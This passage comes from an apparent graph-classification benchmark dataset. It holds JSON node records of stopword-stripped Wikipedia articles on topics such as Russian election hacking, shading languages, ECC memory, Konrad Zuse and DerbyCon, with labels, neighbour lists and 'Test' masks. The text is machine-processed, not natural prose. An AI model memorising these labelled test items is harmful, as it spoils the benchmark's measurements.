news agencies disinformation asserts putin intimately involved russian intelligence operation elect trump directing entire covert operation trump agents putin assets nance delves links trump associates russian officials asserting multiple agents trump assets putin providing access trump nance identifies putin strategy electing trump u.s. president referred operation lucky-7 kremlin plan elect president describes multitask effort involving hacking dnc acquire personal information members well seek compromising material known kompromat battles cyber bears describes two hacker entities tied russian intelligence cozy bear fancy bear cozy bear believed linked russian federal security service fsb foreign intelligence service svr fancy bear associated russian military intelligence agency gru nance describes russian intelligence attempted make releases leaked dnc emails appear deniable wikileaks russia intelligence laundromat likens use whistleblower website wikileaks money laundering nance asserts wikileaks willingly collaborated operation cyber bears attack describes impact podesta emails dnc email leaks 2016 clinton campaign finally cyberwar defend democracy nance reiterates u.s. target cyberwarfare russian intelligence agencies gru fsb directly ordered putin nance writes russia succeeded casting doubt citizens strength u.s. democracy posits u.s. populace large internalize future acts cyberwarfare dangerous attempts subvert daily life could lead actual war beginning research plot hack america nance gained counter-intelligence experience u.s. navy senior chief petty officer naval cryptology served 1981–2001 garnered expertise within fields intelligence counterterrorism author learned russian history interpreter russian began working intelligence field research history soviet union spying agency kgb devoted years research analyzing foreign relations russia prior analyzing russian interference 2016 u.s. elections nance background counter-intelligence analysis included management think tank called terror asymmetrics project strategy tactics radical ideologies consisting central intelligence agency military intelligence officers direct prior field experience nance books counter-terrorism include end al-qaeda terrorist recognition handbook terrorists iraq defeating isis hacking isis nance began work plot hack america incidentally already engaged writing hacking isis course research hacking isis discovered computer hacking germany legislative body bundestag french television station tv5monde time hacks thought caused isis instead traced back russian hacking group cyber bears nance knew russian intelligence gru operated group realized attribution isis false flag operation throw investigators trail gave nance prior knowledge russian intelligence tactics cyber bears infiltrate servers purposes disrupting government case germany injecting propaganda case france 2016 hack dnc apparent nance identical foreign agency carried attack gru nance suspicions borne accurate security firm crowdstrike determined cozy bear fancy bear behind attack nance saw akin watergate scandal albeit virtual attack instead physical break-in democratic facilities nance told c-span majority working life identified member u.s. republican party describing colin powell school republicanism plot hack america written desire intelligence expert document background behind attack foreign power u.s. democratic institutions nance realized gravity attack considered operation must sanctioned managed former kgb officer vladimir putin nance member board directors international spy museum washington d.c work museum nance befriended former kgb general oleg kalugin advised kgb always kgb nance considered putin objectives would simply harm hillary clinton actually attempt achieve ascendancy donald trump u.s. president plot hack america first published online format september 23 2016 day united states intelligence community assessments russian interference 2016 united states elections delivered president barack obama appendix book notes timing points many conclusions included consensus opinion principal three intelligence agencies nsa cia fbi identical plot hack america first paperback format published october 10 2016 second edition released year addition ebook format another edition published 2017 along audiobook narrated gregory itzin author subject hecklers appeared event discuss work books books miami florida 2017 book commercial success wall street journal placed plot hack america list best-selling books week february 19 2017 7th place category nonfiction e-books book included reading course political science pasadena city college review new york journal books michael lipkin effusive writing malcolm nance plot hack america essential primer anyone wanting fully informed unprecedented events surrounding 2016 u.s. presidential election lipkin wrote author expertise subject matter patriot highly experienced respected intelligence expert bringing bear deep extensive knowledge conclusions perhaps one important developments american history lawrence swaim gave nance work favorable reception book review napa valley register wrote quick read present easily best book subject swaim recommended resources back book writing ’ really killer nance book appendix contains extremely revealing assessments made american intelligence agencies presented unclassified format kenneth j. bernstein wrote daily kos convince read important book echoed warning conclusion dangers posed cyberwarfare bernstein wrote book argumentation strengthened every single assertion nance offers backed material ... clearly documented end notes bernstein wrote favorably addition book foreword guardian editor national security spencer ackerman italian language newspaper la stampa called book molto bello writing independent andy martin commented suppose weak spot subtitle word 'tried surely 'try maclean wrote plot hack america prescient russia ’ meddling 2016 u.s election brian lamb founder retired ceo c-span commented book titled choice seemed political nature strategic finance noted nance focuses new hybrid cyber warfare kompromat uses cyber assets way attack political enemies techgenix journalist michael adams wrote nance provides in-depth analysis issue characterized multiple commentators national controversy rivalling watergate scandal adams called book engaging tale espionage including context russian intelligence background vladimir putin kgb voice america commented nance capably outlined evidence book fears russian foreign manipulation 2016 election bob burnett wrote huffington post nance described game thrones strategem vladimir putin using donald trump tool embarrass hillary clinton barack obama burnett observed nance posited trump putin play trump avarice narcissism jeff stein newsweek wrote power disinformation tactics described nance book genius technique correction takes days weeks catch fiction gullible masses digested fabrications truth plot hack america published october 2016 nance interviewed april 2017 c-span book impact media operations american society argued russia today actions back notion black propaganda operations effective referencing impact disinformation operations nance cited research senate intelligence committee house intelligence committee director national intelligence russia today methods publishing propaganda propagating fake news traced larger problem echo chambers wherein false invented story sputnik news traveled bloggers breitbart news became believed factual trump administration officials eventually re-reported russia today falsely stating simply reporting events created white house author recalled c-span days soviet union soviet intelligence operation practice infiltrate manage reporting agencies communist party addition political figures right left perspectives order denigrate u.s. democratic interests nance warned russia control vladimir putin motivated identical initiative armed greater tools funding soviet union past lamented prior putin appointment prime minister russia boris yeltsin country taking steps towards democracy nance traced putin rise descent democracy russia favor oligarchy ruling class wealthy individuals managing autocratic society nance said u.s. citizens become agents russia employ russia today due naivete nature russian propaganda operations geared harm u.s. values civil liberties nance placed utilization propaganda russian intelligence agencies russia today outlets including social media part larger effort global cyberwarfare characterized form hybrid warfare blending traditional propaganda computer tools subversion media organizations case study cited aleksandr dugin russian neofascist political activist views favored putin whose tweets expound perspectives u.s democratic institutions successful",
    "neighbors": [
      176,
      4689,
      8288,
      9688
    ],
    "mask": "Test"
  },
  {
    "node_id": 6032,
    "label": 9,
    "text": "Shading_language:shading language shading language graphics programming language adapted programming shader effects characterizing surfaces volumes objects language forms usually consist special data types like vector matrix color normal due variety target markets 3d computer graphics different shading languages developed shading languages used offline rendering produce maximum image quality material properties totally abstracted little programming skill hardware knowledge required kind shaders often developed artists get right look texture mapping lighting facets work processing shaders time-consuming computational power required expensive ability produce photorealistic results time production rendering run large computer clusters renderman shading language often referenced rsl sl short defined renderman interface specification common shading language production-quality rendering also one first shading languages ever implemented language defines six major shader types houdini vex vector expressions shading language often abbreviated vex closely modeled renderman however integration complete 3d package means shader writer access information inside shader feature usually available rendering context language differences rsl vex mainly syntactic addition differences regarding names several shadeop names gelato shading language like houdini vex closely modeled renderman differences gelato shading language rsl mainly syntactical — gelato uses semicolons instead commas separate arguments function definitions shadeops different names parameters open shading language osl developed sony pictures imageworks use arnold renderer also used blender cycles render engine osl surface volume shaders define surfaces volumes scatter light way allows importance sampling thus well suited physically-based renderers support ray tracing global illumination shading languages real-time rendering widespread provide higher hardware abstraction flexible programming model previous paradigms hardcoded transformation shading equations gives programmer greater control rendering process delivers richer content lower overhead shaders designed executed directly gpu became useful high throughput general processing stream programming model led development compute shaders running similar hardware see also gpgpu historically languages successful establishing maintaining strong market position short description languages follows opengl architecture review board established arb assembly language 2002 standard low-level instruction set programmable graphics processors high-level opengl shading languages often compile arb assembly loading execution unlike high-level shading languages arb assembly support control flow branching however continues used cross-gpu portability required also known glsl glslang standardized shading language meant used opengl language unifies vertex fragment processing single instruction set allowing conditional loops generally branches historically glsl preceded arb assembly language programming language cg developed nvidia designed easy efficient production pipeline integration language features api independence comes large variety free tools improve asset management development cg stopped 2012 language deprecated shader assembly language direct3d 8 9 main programming language vertex pixel shaders shader model 1.0/1.1 2.0 3.0 shader assembly language direct representation intermediate shader bytecode passed graphics driver execution shader assembly language directly used program unified shader model 4.0 4.1 5.0 5.1 although retains function representation intermediate bytecode debug purposes high-level shading language also called hlsl short c-style shader language directx 9 higher xbox game consoles similar nvidia cg supported directx xbox hlsl programs compiled bytecode equivalent directx shader assembly language hlsl introduced optional alternative shader assembly language direct3d 9 became requirement direct3d 10 higher shader assembly language deprecated adobe systems added pixel bender part adobe flash 10 api pixel bender could process pixel 3d-vertex data flash 11 introduced entirely new 3d api called stage3d uses shading language called adobe graphics assembly language agal offers full 3d acceleration support gpu acceleration pixel bender removed flash 11.8 agal low-level platform-independent shading language compiled example glsl sony announced pssl playstation shader language platform-specific shading language similar hlsl playstation 4 apple created low-level graphics api called metal runs macs made since 2012 iphones since 5s ipads since ipad air metal introduces shading language called metal shading language msl based c++14 implemented using clang llvm msl unifies vertex fragment compute processing",
    "neighbors": [
      9345,
      10145,
      10658,
      2374,
      8262,
      4042,
      4332,
      10796,
      10512,
      305,
      10672,
      6420,
      3159,
      987,
      508,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 6033,
    "label": 3,
    "text": "ECC_memory:ecc memory error-correcting code memory ecc memory type computer data storage detect correct most-common kinds internal data corruption ecc memory used computers data corruption tolerated circumstances scientific financial computing typically ecc memory maintains memory system immune single-bit errors data read word always data written even one bits actually stored flipped wrong state non-ecc memory detect errors although non-ecc memory parity support allows detection correction electrical magnetic interference inside computer system cause single bit dynamic random-access memory dram spontaneously flip opposite state initially thought mainly due alpha particles emitted contaminants chip packaging material research shown majority one-off soft errors dram chips occur result background radiation chiefly neutrons cosmic ray secondaries may change contents one memory cells interfere circuitry used read write hence error rates increase rapidly rising altitude example compared sea level rate neutron flux 3.5 times higher 1.5 km 300 times higher 10–12 km cruising altitude commercial airplanes result systems operating high altitudes require special provision reliability example spacecraft cassini–huygens launched 1997 contained two identical flight recorders 2.5 gigabits memory form arrays commercial dram chips thanks built-in edac functionality spacecraft engineering telemetry reported number correctable single-bit-per-word errors uncorrectable double-bit-per-word errors first 2.5 years flight spacecraft reported nearly constant single-bit error rate 280 errors per day however november 6 1997 first month space number errors increased factor four single day attributed solar particle event detected satellite goes 9 concern dram density increases thus components chips get smaller time operating voltages continue fall dram chips affected radiation frequently—since lower-energy particles able change memory cell state hand smaller cells make smaller targets moves technologies soi may make individual cells less susceptible counteract even reverse trend recent studies show single-event upsets due cosmic radiation dropping dramatically process geometry previous concerns increasing bit cell error rates unfounded work published 2007 2009 showed widely varying error rates 7 orders magnitude difference ranging 10 error/bit·h roughly one bit error per hour per gigabyte memory 10 error/bit·h roughly one bit error per millennium per gigabyte memory large-scale study based google large number servers presented sigmetrics/performance ’ 09 conference actual error rate found several orders magnitude higher previous small-scale laboratory studies 25,000 roughly 2.5 × 10 error/bit·h 70,000 roughly 7 × 10 error/bit·h 5 bit errors per 8 gigabytes ram per hour errors per billion device hours per megabit 8 dimm memory modules affected errors per year consequence memory error system-dependent systems without ecc error lead either crash corruption data large-scale production sites memory errors one most-common hardware causes machine crashes memory errors cause security vulnerabilities memory error consequences changes bit neither causes observable malfunctioning affects data used calculations saved 2010 simulation study showed web browser small fraction memory errors caused data corruption although many memory errors intermittent correlated effects memory errors greater would expected independent soft errors tests conclude isolation dram memory cells circumvented unintended side effects specially crafted accesses adjacent cells thus accessing data stored dram causes memory cell leak charges interact electrically result high cell density modern memory altering content nearby memory rows actually addressed original memory access effect known row hammer also used privilege escalation computer security exploits example single-bit error would ignored system error-checking would halt machine parity checking would invisibly corrected ecc single bit stuck 1 due faulty chip becomes changed 1 due background cosmic radiation spreadsheet storing numbers ascii format loaded character 8 decimal value 56 ascii encoding stored byte contains stuck bit lowest bit position change made spreadsheet saved result 8 0011 1000 binary silently become 9 0011 1001 several approaches developed deal unwanted bit-flips including immunity-aware programming ram parity memory ecc memory problem mitigated using dram modules include extra memory bits memory controllers exploit bits extra bits used record parity use error-correcting code ecc parity allows detection single-bit errors actually odd number wrong bits most-common error correcting code single-error correction double-error detection secded hamming code allows single-bit error corrected usual configuration extra parity bit double-bit errors detected chipkill ecc effective version also corrects multiple bit errors including loss entire memory chip seymour cray famously said parity farmers asked left cdc 6600 later included parity cdc 7600 caused pundits remark apparently lot farmers buy computers original ibm pc pcs early 1990s used parity checking later ones mostly many current microprocessor memory controllers including almost amd 64-bit offerings support ecc many motherboards particular using low-end chipsets ecc-capable memory controller detect correct errors single bit per 64-bit word unit bus transfer detect correct errors two bits per 64-bit word bios computers matched operating systems versions linux macos windows allows counting detected corrected memory errors part help identify failing memory modules problem becomes catastrophic dram chips include internal on-chip error correction circuits allow systems non-ecc memory controllers still gain benefits ecc memory systems similar effect may achieved using eos memory modules error detection correction edac depends expectation kinds errors occur implicitly assumed failure bit word memory independent resulting improbability two simultaneous errors used case memory chips one-bit wide typical first half 1980s later developments moved many bits chip weakness addressed various technologies including ibm chipkill sun microsystems extended ecc hewlett packard chipspare intel single device data correction sddc dram memory may provide increased protection soft errors relying error correcting codes error-correcting memory known ecc edac-protected memory particularly desirable high fault-tolerant applications servers well deep-space applications due increased radiation systems also scrub memory periodically reading addresses writing back corrected versions necessary remove soft errors interleaving allows distribution effect single cosmic ray potentially upsetting multiple physically neighboring bits across multiple words associating neighboring bits different words long single event upset seu exceed error threshold e.g. single error particular word accesses corrected e.g. single-bit error correcting code effectively error-free memory system may maintained error-correcting memory controllers traditionally use hamming codes although use triple modular redundancy tmr latter preferred hardware faster hamming error correction scheme space satellite systems often use tmr although satellite ram usually uses hamming error correction many early implementations ecc memory mask correctable errors acting error never occurred report uncorrectable errors modern implementations log correctable errors ce uncorrectable errors ue people proactively replace memory modules exhibit high error rates order reduce likelihood uncorrectable error events many ecc memory systems use external edac circuit cpu memory systems ecc memory use internal external edac systems external edac system designed correct certain errors internal edac system unable correct modern desktop server cpus integrate edac circuit cpu especially shift toward cpu-integrated memory controllers related numa architecture 2009 most-common error-correction codes use hamming hsiao codes provide single-bit error correction double-bit error detection sec-ded error-correction codes proposed protecting memory double-bit error correcting triple-bit error detecting dec-ted codes single-nibble error correcting double-nibble error detecting snc-dnd codes reed–solomon error correction codes etc however practice multi-bit correction usually implemented interleaving multiple sec-ded codes early research attempted minimize area delay overheads ecc circuits hamming first demonstrated sec-ded codes possible one particular check matrix hsiao showed alternative matrix odd weight columns provides sec-ded capability less hardware area shorter delay traditional hamming sec-ded codes recent research also attempts minimize power addition minimizing area delay many processors use error-correction codes on-chip cache including intel itanium xeon processors amd athlon opteron zen- zen+-based processors epyc epyc embedded ryzen ryzen threadripper dec alpha 21264. edc/ecc ecc/ecc two most-common cache error-protection techniques used commercial microprocessors edc/ecc technique uses error-detecting code edc level 1 cache error detected data recovered ecc-protected level 2 cache ecc/ecc technique uses ecc-protected level 1 cache ecc-protected level 2 cache cpus use edc/ecc technique always write-through stores level 2 cache error detected read level 1 data cache copy data recovered level 2 cache registered buffered memory ecc technologies perform different functions usual memory used servers registered allow many memory modules used without electrical problems ecc data integrity memory used desktop computers neither economy however unbuffered not-registered ecc memory available non-server motherboards support ecc functionality modules used cpu supports ecc registered memory work reliably motherboards without buffering circuitry vice versa ultimately trade-off protection unusual loss data higher cost ecc protects undetected memory data corruption used computers corruption unacceptable example scientific financial computing applications file servers ecc also reduces number crashes especially unacceptable multi-user server applications maximum-availability systems motherboards processors less critical application designed support ecc prices kept lower ecc-enabled boards processors able support unbuffered unregistered ecc also work non-ecc memory system firmware enables ecc functionality ecc ram installed ecc memory usually involves higher price compared non-ecc memory due additional hardware required producing ecc memory modules due lower production volumes ecc memory associated system hardware motherboards chipsets processors support ecc may also expensive ecc may lower memory performance around 2–3 percent systems depending application implementation due additional time needed ecc memory controllers perform error checking however modern systems integrate ecc testing cpu generating additional delay memory accesses long errors detected",
    "neighbors": [
      6659,
      9092,
      1414,
      1801,
      5645,
      3473,
      5523,
      6804,
      5883,
      2339,
      4773,
      9599,
      11183,
      7601,
      306,
      823,
      6071,
      1722,
      9665,
      10945,
      7235,
      2503,
      2764,
      2383,
      7631,
      3153,
      9551,
      9685,
      2525,
      2791,
      1515,
      10734,
      3323,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 6034,
    "label": 8,
    "text": "HTML5test:html5test html5test web application evaluating web browser accuracy implementing web standards html5 web sql database developed world wide web consortium well webgl standard developed mozilla foundation khronos group test suite developed dutch web programmer niels leenheer published march 2010 test web browser user must visit home page website html5test.com application returns integer score possible 555 points point total changed multiple times evolution software leenheer introduced present scoring system part major redesign test introduced november 2013 html5test evaluates browser support web storage w3c geolocation api html5-specific html elements including canvas element features evaluate browser conformance web standards cascading style sheets ecmascript scalable vector graphics document object model conformance testing standards within purview acid3 automated test published ian hickson 2008 similarly acid3 evaluate browser html5 conformance test scope html5test test scope acid3 mutually exclusive",
    "neighbors": [
      417,
      3462,
      4326,
      488,
      8296,
      9275,
      8689,
      8854,
      2139,
      124,
      8923,
      735
    ],
    "mask": "None"
  },
  {
    "node_id": 6035,
    "label": 4,
    "text": "TrashMail:trashmail trashmail trashmail.net free disposable e-mail address service created 2002 stephan ferraro computer science student epitech paris belongs ferraro ltd service provides temporary email addresses abandoned start receiving email spam mainly forwards emails real hidden email address trashmail receives emails forwards real hidden email address account creation option set number total forwards date disposable email expires forwarded email counter decreased 1 counter reaches 0 date limit expired temporary email address deleted temporary email address deleted incoming email rejected smtp code 550 5.1.1 trashmail also provides free open-source add-on mozilla firefox available official store email registration community forum provided https ssl http access protect privacy additionally smtp server communication tls enabled many spammers rely harvested email addresses best method avoiding spam publish one real email address providing temporary address trashmail allows users protect real email trashmail differs disposable email address services possibility use challenge-response system free disposable email address additionally provides real-time spam stats main page possible verify current incoming spam amount site trashmail used homepage www.trashmail.net however api provided documented forum explains write custom software use free service following trashmail software written",
    "neighbors": [
      8455,
      9909,
      5078,
      6975
    ],
    "mask": "None"
  },
  {
    "node_id": 6036,
    "label": 9,
    "text": "Konrad_Zuse:konrad zuse konrad zuse 22 june 1910 – 18 december 1995 german civil engineer computer scientist inventor businessman computer pioneer greatest achievement world first programmable computer functional program-controlled turing-complete z3 became operational may 1941 thanks machine predecessors zuse often regarded inventor modern computer zuse also noted s2 computing machine considered first process control computer founded one earliest computer businesses 1941 producing z4 became world first commercial computer 1943 1945 designed first high-level programming language plankalkül 1969 zuse suggested concept computation-based universe book rechnender raum calculating space much early work financed family commerce 1939 given resources nazi german government due world war ii zuse work went largely unnoticed united kingdom united states possibly first documented influence us company ibm option patents 1946 replica z3 well original z4 deutsches museum munich deutsches technikmuseum berlin exhibition devoted zuse displaying twelve machines including replica z1 several zuse paintings born berlin 22 june 1910 moved family 1912 east prussian braunsberg braniewo poland father postal clerk zuse attended collegium hosianum braunsberg 1923 family moved hoyerswerda passed abitur 1928 qualifying enter university enrolled technische hochschule berlin technical university berlin explored engineering architecture found boring zuse pursued civil engineering graduating 1935 time worked ford motor company using considerable artistic skills design advertisements started work design engineer henschel aircraft factory schönefeld near berlin required performance many routine calculations hand found mind-numbingly boring leading dream machine beginning 1935 experimented construction computers parents flat wrangelstraße 38 moving new flat methfesselstraße 10 street leading kreuzberg berlin working parents apartment 1936 produced first attempt z1 floating point binary mechanical calculator limited programmability reading instructions perforated 35 mm film 1937 zuse submitted two patents anticipated von neumann architecture finished z1 1938 z1 contained 30,000 metal parts never worked well due insufficient mechanical precision 30 january 1944 z1 original blueprints destroyed parents flat many neighbouring buildings british air raid world war ii 1987 1989 zuse recreated z1 suffering heart attack midway project cost 800,000 dm approximately 500,000 required four individuals including zuse assemble funding retrocomputing project provided siemens consortium five companies zuse completed work entirely independently leading computer scientists mathematicians day 1936 1945 near-total intellectual isolation 1939 zuse called military service given resources ultimately build z2 september 1940 zuse presented z2 covering several rooms parental flat experts deutsche versuchsanstalt für luftfahrt dvl i.e german research institute aviation z2 revised version z1 using telephone relays dvl granted research subsidies 1941 zuse started company zuse apparatebau zuse apparatus construction manufacture machines renting workshop opposite side methfesselstraße 7 stretching block belle-alliance straße 29 renamed renumbered mehringdamm 84 1947 improving basic z2 machine built z3 1941 12 may 1941 zuse presented z3 built workshop public z3 binary 22-bit floating point calculator featuring programmability loops without conditional jumps memory calculation unit based telephone relays telephone relays used machines largely collected discarded stock despite absence conditional jumps z3 turing complete computer however turing-completeness never considered zuse practical applications mind demonstrated 1998 see history computing hardware z3 first fully operational electromechanical computer partially financed german government-supported dvl wanted extensive calculations automated request co-worker helmut schreyer—who helped zuse build z3 prototype 1938—for government funding electronic successor z3 denied strategically unimportant work z4 could resumed immediately extreme privation post-war germany 1949 able resume work showed mathematician eduard stiefel swiss federal institute technology zurich eidgenössische technische hochschule eth zürich ordered one 1950 8 november 1949 zuse kg founded z4 delivered eth zurich 12 july 1950 proved reliable 1940 german government began funding aerodynamische versuchsanstalt ava aerodynamic research institute forerunner dlr used work production glide bombs zuse built s1 s2 computing machines special purpose devices computed aerodynamic corrections wings radio-controlled flying bombs s2 featured integrated analog-to-digital converter program control making first process-controlled computer machines contributed henschel werke hs 293 hs 294 guided missiles developed german military 1941 1945 precursors modern cruise missile circuit design s1 predecessor zuse z11 zuse believed machines captured occupying soviet troops 1945 working z4 computer zuse realised programming machine code complicated started working phd thesis containing groundbreaking research years ahead time mainly first high-level programming language plankalkül plan calculus elaborate example program first real computer chess engine 1945 luisenstadt bombing flew berlin rural allgäu unable hardware development continued working plankalkül eventually publishing brief excerpts thesis 1948 1959 work entirety however remained unpublished 1972 phd thesis submitted university augsburg rejected formal reasons zuse forgot pay 400 mark university enrollment fee rejection bother plankalkül slightly influenced design algol 58 implemented 1975 dissertation joachim hohmann heinz rutishauser one inventors algol wrote first attempt devise algorithmic language undertaken 1948 k. zuse notation quite general proposal never attained consideration deserved implementations followed 1998 2000 team free university berlin donald knuth suggested thought experiment might happened bombing taken place phd thesis accordingly published planned addition computing-related work described zuse began work 1956 high precision large format plotter demonstrated 1961 hanover fair became well known also outside technical world thanks frieder nake pioneering computer art work plotters designed zuse include zuse z90 zuse z9004 last years life zuse conceptualized created purely mechanical extensible modular tower automaton named helix tower helixturm structure based gear drive employs rotary motion e.g provided crank assemble modular components storage space elevating tube-shaped tower process reversible inverting input direction deconstruct tower store components deutsches museum restored zuse original 1:30 functional model extended height 2.7 m. zuse intended full construction reach height 120 envisioned use wind power generators radio transmission installations konrad zuse married gisela brandes january 1945 employing carriage dressed tailcoat top hat gisela wedding veil zuse attached importance noble ceremony son horst first five children born november 1945 zuse never became member nazi party known expressed doubts qualms working nazi war effort much later suggested modern times best scientists engineers usually choose either work less questionable business military interests faustian bargain pursuing line work according memoirs german computer pioneer heinz billing max planck institute physics published genscher düsseldorf meeting alan turing konrad zuse took place göttingen 1947 encounter form colloquium participants womersley turing porter england german researchers like zuse walther billing details see herbert bruderer konrad zuse und die schweiz retired focused hobby painting zuse atheist zuse died 18 december 1995 hünfeld hesse near fulda heart failure world war 2 zuse founded one earliest computer companies zuse-ingenieurbüro hopferau capital raised 1946 eth zurich ibm option zuse patents zuse founded another company zuse kg haunetal-neukirchen 1949 1957 company head office moved bad hersfeld z4 finished delivered eth zurich switzerland september 1950 time working computer continental europe second computer world sold beaten binac never worked properly delivered computers numbered leading z z43 built zuse company notable z11 sold optics industry universities z22 first computer memory based magnetic storage 1967 zuse kg built total 251 computers owing financial problems company sold siemens 1967 zuse also suggested universe running cellular automaton similar computational structure digital physics 1969 published book rechnender raum translated english calculating space idea attracted lot attention since physical evidence zuse thesis edward fredkin 1980s jürgen schmidhuber 1990s others expanded zuse received several awards work zuse institute berlin named honour konrad zuse medal gesellschaft für informatik konrad zuse medal zentralverband des deutschen baugewerbes central association german construction named zuse 100th anniversary birth computer pioneer celebrated exhibitions lectures workshops remember life work bring attention importance invention digital age movie revolves around world inside computer system features character named zuse presumably honour konrad zuse german posts dp ag issued commemorative stamp occasion june 6 2010 zuse portrait composed solely binary code numbers 1 0 fine print",
    "neighbors": [
      512,
      1952,
      6950,
      8262,
      10953,
      9804,
      9932,
      2798,
      1776,
      5585,
      9330,
      5946,
      3323,
      7421
    ],
    "mask": "Test"
  },
  {
    "node_id": 6037,
    "label": 2,
    "text": "Target_Disk_Mode:target disk mode target disk mode sometimes referred tdm target mode boot mode unique macintosh computers mac supports target disk mode started 't key held operating system boot instead mac firmware enables drives behave scsi firewire thunderbolt and/or usb-c external mass storage device mac booted target mode attached port computer mac pc appear external device hard drives within target mac example formatted partitioned etc. exactly like external drive computers also make internal cd/dvd drives internal external peripheral hardware available host computer target disk mode useful accessing contents mac booted operating system target disk mode preferred form old-computer new-computer interconnect used apple migration assistant migration assistant supports ethernet wired wi-fi tdm neither supports usb however thunderbolt-to-firewire thunderbolt-to-gigabit-ethernet usb-3.0-to-gigabit-ethernet adapters option one computers firewire thunderbolt apple introduced disk mode access original powerbook 100 continued offer subsequent powerbook series firewire-equipped macs long requisite software appeared system rom mac could booted disk mode originally called scsi disk mode special cable scsi system cable allowed original powerbook series attach desktop mac external scsi disk unique system control panel powerbook used select non-conflicting scsi id number host mac also made possible select disk startup control panel boot change ide drives starting powerbook 150 190 apple implemented hd target mode essentially enabled scsi disk mode translating external scsi commands via ata driver officially reserved apple portables powerbooks exclusively supported disk mode except 140 145 145b 150 170 however scsi disk mode implemented unofficially macintosh external scsi port suspending startup process interrupt switch long internal drives chain set different ids active host system devices apple dropped scsi interface starting agp power mac g4 “ pismo ” powerbook g3 firewire target disk mode replaced earlier disk mode implementation also receiving official support beyond laptops subsequent macs built-in firewire thunderbolt supports target disk mode 12-inch retina macbook early 2015 one expansion port usb-c port supports charging external displays target disk mode using target disk mode macbook requires cable supports usb 3.0 usb 3.1 either usb-a usb-c connector one end usb-c connector end macbook target computer computer placed tdm must host computer computer target disk mode booted computer plugged merely needs meet requirements external mass storage device using bus question access native mac formatted partitions boot volume desired support correct version hierarchical file system classic mac os means firewire 2.3.3 later mac os 8.6 later required use firewire target host computer may run microsoft windows possible shortcomings read mac hfs-formatted partitions extra drivers macdrive transmac macdisk hfsexplorer necessary users also must ensure computer possesses appropriate interface hardware order physically connect mac target mode macdrive also read-only option prevent accidental editing computer target disk mode however mode set hfs/hfs+ disk mounted addition hfs drivers apple bootcamp also become possible macs running windows read write hfs partitions without purchase software users separated drivers main bootcamp install also install windows computers host computers running linux also able read write mac hfs hfs+ formatted devices target disk mode working out-of-the-box distributions hfs+ support part linux kernel however filesystems checked errors shrinking moving partitions preferred use mac os",
    "neighbors": [
      11521,
      2723,
      6183,
      6797,
      8525,
      7983,
      5616,
      5457,
      6769,
      147,
      8114,
      6165,
      823,
      2811,
      1439
    ],
    "mask": "Test"
  },
  {
    "node_id": 6038,
    "label": 3,
    "text": "MDMX:mdmx mdmx mips digital media extension also known madmax extension mips architecture released october 1996 microprocessor forum mdmx developed accelerate multimedia applications becoming popular common 1990s risc cisc systems mdmx defines new set thirty-two 64-bit registers called media registers mapped onto existing floating-point registers save hardware 192-bit extended product accumulator media registers hold two new data types octo byte ob quad half qh contain eight bytes 8-bit four halfwords 16-bit integers variants existing instructions operate data types performing saturating arithmetic logical shift compare align operations mdmx also introduced 19 instructions permutation manipulating bytes registers performing arithmetic accumulator accumulator access",
    "neighbors": [
      8450,
      2821,
      1798,
      4491,
      6924,
      4237,
      9369,
      9500,
      2088,
      9391,
      8120,
      8506,
      1085,
      8125,
      8126,
      833,
      7234,
      9541,
      3142,
      5326,
      977,
      2514,
      5844,
      9428,
      8795,
      2655,
      1122,
      7783,
      10985,
      9964,
      5358,
      9582,
      8944,
      499,
      1399,
      9976,
      4603,
      10620
    ],
    "mask": "Test"
  },
  {
    "node_id": 6039,
    "label": 9,
    "text": "Java_Metadata_Interface:java metadata interface given metadata set descriptive structural administrative data group computer data example database schema java metadata interface jmi platform-neutral specification defines creation storage access lookup exchange metadata java programming language jmi specification developed java community process defined jsr 40 jsr formal document describe proposed specifications technologies adding java platform jmi based meta-object facility mof specification object management group omg mof metamodel model kind metadata used notably define unified modeling language uml supports exchange metadata xmi xmi standard exchanging metadata information via extensible markup language xml mof/xmi specifications used exchange uml models essentially jmi used write tools java manipulating uml models used model driven architecture and/or model driven development many implementations jmi including reference implementation unisys sap netweaver sun microsystems open-source implementation netbeans group jmi compatible java se 1.3",
    "neighbors": [
      4960,
      9665,
      6338,
      8262,
      5677,
      6039,
      7326
    ],
    "mask": "None"
  },
  {
    "node_id": 6040,
    "label": 4,
    "text": "DerbyCon:derbycon derbycon computer security conference based louisville kentucky first derbycon took place 2011 founded martin bos dave kennedy alex kah adrian crenshaw conference held hyatt regency louisville typically late september january 14 2019 organizers announced derbycon 9.0 held september 2019 would last series citing increasing difficulty holding conferences face small yet vocal group people creating negativity polarization disruption derbycon common activities include along five parallel tracks also vendors tables games training village lockpick feature also included book publishers hardware vendors t-shirts printed",
    "neighbors": [
      7449,
      11435
    ],
    "mask": "Test"
  },
  {
    "node_id": 6041,
    "label": 3,
    "text": "Dprobes:dprobes dprobes dynamic probes linux kernel analysis framework created 2004 features ability insert software probes dynamically running code based kprobes first versions released june 2004. dprobes first introduced suse linux enterprise server sles since 2006 commercial linux distributions headed towards systemtap chosen analysis mechanism",
    "neighbors": [
      11506,
      5222,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 6042,
    "label": 7,
    "text": "MTA_SZTAKI_Laboratory_of_Parallel_and_Distributed_Systems:mta sztaki laboratory parallel distributed systems laboratory parallel distributed systems lpds department mta sztaki research laboratory distributed grid cloud technologies lpds founding member hungarian grid competence centre hungarian national grid initiative hungarian opennebula community also coordinates several european grid/cloud projects mission lpds twofold one hand would like provide efficient software development tools high-level services together customizable scientific gateways hand lpds developing easy-to-maintain middleware solutions technologies interoperability enables cost-efficient alternative distributed grid cloud platforms scientific business applications lpds laboratory cooperation departments mta sztaki involved development sztaki cloud takes part cloud-based projects lpds cloud research focusing field infrastructure service iaas -based cloud systems make previously evolved products services lpds available cloud-based executing scalable transparent way guse grid cloud user support environment well-known permanently improving open source science gateway framework enables users convenient easy access grid cloud infrastructures developed support large variety user communities provides general purpose workflow-oriented graphical user interface create run workflows various distributed computing infrastructures including clusters grids desktop grids clouds guse framework used national grid initiatives ngis support small user communities afford develop customized science gateway p-grade portal liferay technology-based web portal guse accessed via major modern web browsers like chrome firefox etc supports development submission distributed applications executed computational resources various distributed computing infrastructures dcis including clusters service grids desktop grids clouds data avenue file commander tool data transfer enabling easy data moving various storage services various network protocols data avenue integrated ws-pgrade portlet goal sztaki cloud develop deploy institutional cloud infrastructure allows significant improvement traditional institutional infrastructure new cloud-based infrastructure significantly effective cost efficient former infrastructure built traditional conceptions individual specific servers sztaki desktop grid provides enterprise solution exploit pcs clusters located different sites company institute solving large scale distributed 